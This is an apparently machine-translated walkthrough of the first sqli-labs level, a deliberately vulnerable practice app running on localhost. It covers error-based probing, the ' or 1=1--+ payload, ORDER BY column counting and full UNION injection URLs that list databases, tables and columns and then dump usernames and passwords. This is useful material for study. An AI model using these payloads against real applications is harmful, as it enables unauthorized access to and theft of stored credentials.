Sqli-labs less 1

Less-1

We can just add a ' to look at the effect after http://127.0.0.1/sqllib/Less-5/?id=1:

From the above error, we can see that the commit to SQL 1 ' after the SQL statement constructed after the formation of ' 1 ' LIMIT 0, 1, add a '. This way is to get the information we need from the error message, then how do we want to remove the superfluous?

Try ' or 1=1--+

The SQL statement that is constructed now becomes

Select ****** where id= ' 1 ' or 1=1--+ ' LIMIT 0,1

You can see the normal return data.

Order by can be used here. Order BY to sort the previous data, here are three columns of data, we can only use ORDER by 3, more than 3 will be error.

The result of ' order by 4--+ ' shows that the result is exceeded.

Finally, from the source code to analyze why the injection is caused?

The SQL statement is $sql= "SELECT * from Users WHERE id= ' $id ' LIMIT 0,1";

ID parameter when stitching SQL statement, do not do any filtering of the ID, so when committing ' or 1=1--+, the directly constructed SQL statement is

SELECT * from Users WHERE id= ' 1 ' or 1=1--+ LIMIT 0,1

This statement is forever true because of or 1=1.

?

?

In addition, the Union joint injection is described here, and the Union is to federate two SQL statements. The Union can be seen in the following example, emphasizing that the two SQL statements before and after the Union have the same choice of columns. The difference between Union all and Union is that it increases the function of de-weight. Based on the above background knowledge, we carry out the application of information_schema knowledge.

Http://127.0.0.1/sqllib/Less-1/?id=-1 ' Union Select 1,2--+

When the ID data does not exist in the database, (at this point we can id=-1, two SQL statements for the Union operation, the current statement selection is empty, we will show the contents of the following statement) Here the foreground page returns the data of the Union we constructed.

Exploded database

Http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat (schema_name), 3%20from%20information_ schema.schemata--+

The SQL statement at this time is select * from the Users WHERE id= '-1 ' union select 1,group_concat (schema_name), 3 from information_schema.schemata-- + LIMIT 0,1

?

Data sheet for the explosion security database

HTTP://127.0.0.1/SQLLIB/LESS-1/?ID=-1%27UNION%20SELECT%201,GROUP_CONCAT (table_name), 3%20from%20information_ schema.tables%20where%20table_schema=%27security%27--+

The SQL statement at this time is select * from the users where id= '-1 ' union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where Table_schema= ' security '--+ LIMIT 0,1

?

To explode the columns of the Users table

Http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat (column_name), 3%20from%20information_ schema.columns%20where%20table_name=%27users%27--+

The SQL statement at this time is select * from the Users WHERE id= '-1 ' union select 1,group_concat (column_name), 3 from Information_schema.columns Where table_name= ' users '--+ LIMIT 0,1

?

?

Burst data

http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=2--+

The SQL statement at this time is select * from users where id= '-1 ' union select 1,username,password from users where id=2--+ LIMIT 0,1

?

?

LESS1-LESS4 can be injected using the above union operation. We will not repeat the following.

Sqli-labs less 1